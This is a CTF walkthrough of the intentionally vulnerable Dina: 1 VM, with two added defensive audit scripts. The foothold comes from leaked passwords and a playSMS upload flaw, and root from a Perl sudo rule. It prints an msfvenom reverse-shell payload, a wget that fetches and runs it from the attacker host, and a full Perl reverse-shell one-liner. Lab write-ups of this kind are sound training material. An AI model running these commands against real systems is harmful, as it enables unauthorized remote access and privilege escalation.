Amonsec


Dina: CTF walkthrough

Introduction

Name: Dina: 1
Release date: 10 Jul 2017
Author: Touhid Shaikh
Series: Dina
Contact: touhidshaikh22 [at] gmaill [dot] com
Website: http://www.touhidshaikh.com
VM link: https://drive.google.com/open?id=0B1qWCgvhnTXgNUF6Rlp0c3Rlb0k

Note: the link to download the virtual machine on VulnHub is not up to date. If you want to finish this CTF, you have to download it from the link above. Thanks to Touhid, who provided me with the correct link after a short exchange via email.

Reconnaissance

We retrieve the IP address of the target system with arp-scan.

[Figure: arp-scan output showing the IP address of Dina]

Let’s scan this system with nmap.

root@kali:~# nmap -A -O -T5 -p- --reason 192.168.1.51

Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-21 06:38 CEST
Warning: 192.168.1.51 giving up on port because retransmission cap hit (2).
Nmap scan report for dina.home (192.168.1.51)
Host is up, received arp-response (0.010s latency).
Not shown: 65522 closed ports
Reason: 65522 resets
PORT      STATE    SERVICE       REASON         VERSION
80/tcp    open     http          syn-ack ttl 64 Apache httpd 2.2.22 ((Ubuntu))
| http-robots.txt: 5 disallowed entries 
|_/ange1 /angel1 /nothing /tmp /uploads
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Dina
3337/tcp  filtered directv-catlg no-response
10107/tcp filtered bctp-server   no-response
15290/tcp filtered unknown       no-response
23358/tcp filtered unknown       no-response
31816/tcp filtered unknown       no-response
33087/tcp filtered unknown       no-response
49219/tcp filtered unknown       no-response
50535/tcp filtered unknown       no-response
52909/tcp filtered unknown       no-response
55107/tcp filtered unknown       no-response
57197/tcp filtered unknown       no-response
62644/tcp filtered unknown       no-response
MAC Address: 24:0A:64:9E:6E:74 (AzureWave Technology)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.5
Network Distance: 1 hop

TRACEROUTE
HOP RTT      ADDRESS
1   10.14 ms dina.home (192.168.1.51)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 208.73 seconds
root@kali:~#

Port 80 seems to be the only usable service.


Website analysis

According to the robots.txt file, there is a directory called nothing, and the index page of this directory contains a list of passwords hidden in an HTML comment. We will use them later.

root@kali:~# curl http://192.168.1.51/nothing/
<html>
<head><title>404 NOT FOUND</title></head>
<body>
<!--
#my secret pass
freedom
password
helloworld!
diana
iloveroot
-->
<h1>NOT FOUND</html>
<h3>go back</h3>
</body>
</html>
root@kali:~#
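The password list above leaked through an HTML comment that the server happily returns with a 404 page. As an added example (not part of the original post), here is a small check a site owner can run over their own pages to catch this class of leak: it extracts every HTML comment and flags those that mention passwords or secrets together with the bare tokens that follow. The sample page body is retyped from the curl output above.

```python
import re
from typing import Dict, List

# Constructed sample: the /nothing/ index page as shown in the post
SAMPLE_PAGE = """<html>
<head><title>404 NOT FOUND</title></head>
<body>
<!--
#my secret pass
freedom
password
helloworld!
diana
iloveroot
-->
<h1>NOT FOUND</html>
<h3>go back</h3>
</body>
</html>
"""

COMMENT_RE = re.compile(r"<!--(.*?)-->", re.DOTALL)
# Words that make a comment look like a credential dump
SECRET_HINT_RE = re.compile(r"pass(word)?|secret|cred|login|key", re.IGNORECASE)


def html_comments(body: str) -> List[str]:
    """Return the text of every HTML comment in the page body."""
    return [m.group(1).strip() for m in COMMENT_RE.finditer(body)]


def suspicious_comments(body: str) -> List[Dict[str, object]]:
    """Flag comments that mention passwords/secrets and list the bare
    single-token lines after the hint (the shape of Dina's leaked list)."""
    findings = []
    for text in html_comments(body):
        lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
        if not any(SECRET_HINT_RE.search(ln) for ln in lines):
            continue
        # Candidate secrets: non-comment lines with no whitespace
        tokens = [ln for ln in lines if not ln.startswith("#") and " " not in ln]
        findings.append({"hint": lines[0], "candidates": tokens})
    return findings
```

Running `suspicious_comments(SAMPLE_PAGE)` reports the comment headed "#my secret pass" with its five candidate values; the same function can be pointed at a crawl of any site you operate.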

With the gobuster tool we can find another interesting directory: secure.

root@kali:~/Desktop# gobuster -u http://192.168.1.51/ -w /usr/share/seclists/Discovery/Web_Content/common.txt \
> -s 200,204,301,302,307,403,500 -e -m dir

Gobuster v1.2                OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://192.168.1.51/
[+] Threads      : 10
[+] Wordlist     : /usr/share/seclists/Discovery/Web_Content/common.txt
[+] Status codes : 301,302,307,403,500,200,204
[+] Expanded     : true
=====================================================
http://192.168.1.51/.hta (Status: 403)
http://192.168.1.51/.htaccess (Status: 403)
http://192.168.1.51/.htpasswd (Status: 403)
http://192.168.1.51/cgi-bin/ (Status: 403)
http://192.168.1.51/index (Status: 200)
http://192.168.1.51/index.html (Status: 200)
http://192.168.1.51/robots (Status: 200)
http://192.168.1.51/robots.txt (Status: 200)
http://192.168.1.51/secure (Status: 301)
http://192.168.1.51/server-status (Status: 403)
http://192.168.1.51/tmp (Status: 301)
http://192.168.1.51/uploads (Status: 301)
=====================================================
root@kali:~/Desktop#

In this directory we can download a password-protected ZIP file. Fortunately for us, one of the previously found passwords allows us to unzip it.

password: freedom

The extracted file is not a real MP3 file, just a text file with a hint for the next step.

root@kali:~/Desktop# cat backup-cred.mp3 

I am not toooo smart in computer .......dat the resoan i always choose easy password...with creds backup file....

uname: touhid
password: ******


url : /SecreTSMSgatwayLogin
root@kali:~/Desktop#

We gain access to the admin panel of the playSMS web application with the following credentials.

touhid:diana

'sendfromfile.php' vulnerability

Following this exploit (from the VM author), we can execute PHP code by changing the name of the uploaded file with Burp Suite.

We generate a Linux reverse shell with msfvenom.

root@kali:~# msfvenom -p linux/x86/meterpreter/reverse_tcp LPORT=1337 LHOST=192.168.1.102 -f elf -o rshell
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 123 bytes
Final size of elf file: 207 bytes
Saved as: rshell
root@kali:~#

Note: in order to avoid bad characters, we base64-encode the commands. Here are the commands that will be used.

root@kali:~# echo 'wget http://192.168.1.102/rshell -O /tmp/rshell' |base64
d2dldCBodHRwOi8vMTkyLjE2OC4xLjEwMi9yc2hlbGwgLU8gL3RtcC9yc2hlbGwK
root@kali:~# 
root@kali:~# 
root@kali:~# echo 'chmod 777 /tmp/rshell; ls -la /tmp/rshell' |base64
Y2htb2QgNzc3IC90bXAvcnNoZWxsOyBscyAtbGEgL3RtcC9yc2hlbGwK
root@kali:~# 
root@kali:~# echo '/tmp/rshell' |base64 
L3RtcC9yc2hlbGwK
root@kali:~#

We upload our reverse shell to Dina.

[Figure: uploading the reverse shell through the playSMS admin panel]

Finally, we execute our reverse shell to obtain a low-privilege shell.

[Figure: executing the reverse shell]
[Figure: low-privilege reverse shell as www-data]

Privilege escalation

Let's see what we can do with our user.

[Figure: sudo -l output showing the Perl sudo rule]

Nice, we are able to execute arbitrary Perl code with root privileges via sudo.

We can use a one-liner Perl reverse shell to obtain a root shell.

www-data@Dina:/var$ sudo perl -e 'use Socket;$i="192.168.1.102";$p=666;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
[Figure: root shell obtained through the Perl reverse shell]
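The root shell comes from a sudo rule that hands an interpreter to a low-privilege account, which is equivalent to granting root. As an added example (not from the original post), the audit below parses sudoers-style rules and flags any non-root user allowed to run a shell-capable binary as root. The sample rules are constructed; the post only shows Dina's actual rule in a screenshot, so the www-data/perl line is an assumption about its shape.

```python
import re
from typing import Dict, List

# Binaries that can run arbitrary code or spawn a shell; granting one of
# these via sudo is granting root. Perl is the one Dina gives to www-data.
SHELL_CAPABLE = {"perl", "python", "python2", "python3", "ruby", "php",
                 "sh", "bash", "vi", "vim", "env"}

# Constructed sample sudoers content (assumed shape of Dina's rule)
SAMPLE_SUDOERS = """
Defaults env_reset
root    ALL=(ALL:ALL) ALL
www-data ALL=(root) NOPASSWD: /usr/bin/perl
backup  ALL=(root) NOPASSWD: /usr/bin/rsync
deploy  ALL=(root) /usr/local/bin/deploy.sh
"""

# user  host=(runas) [TAG:] cmd[, cmd...]
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+\S+=\((?P<runas>[^)]*)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$")


def parse_sudoers(text: str) -> List[Dict[str, object]]:
    """Split sudoers rules into one record per command."""
    rules = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(("#", "Defaults")):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        for cmd in m.group("cmds").split(","):
            rules.append({"user": m.group("user"), "runas": m.group("runas"),
                          "nopasswd": "NOPASSWD" in m.group("tags"),
                          "cmd": cmd.strip()})
    return rules


def risky_rules(text: str) -> List[Dict[str, object]]:
    """Rules where a non-root user may run ALL or a shell-capable binary as root."""
    out = []
    for r in parse_sudoers(text):
        runas_root = str(r["runas"]).split(":")[0] in ("root", "ALL")
        base = str(r["cmd"]).split()[0].rsplit("/", 1)[-1]
        if r["user"] != "root" and runas_root and (r["cmd"] == "ALL" or base in SHELL_CAPABLE):
            out.append(r)
    return out
```

On the sample, only the www-data rule is reported; the rsync and deploy.sh rules pass because their binaries are not interpreters, though a real review would still inspect what those commands accept as arguments.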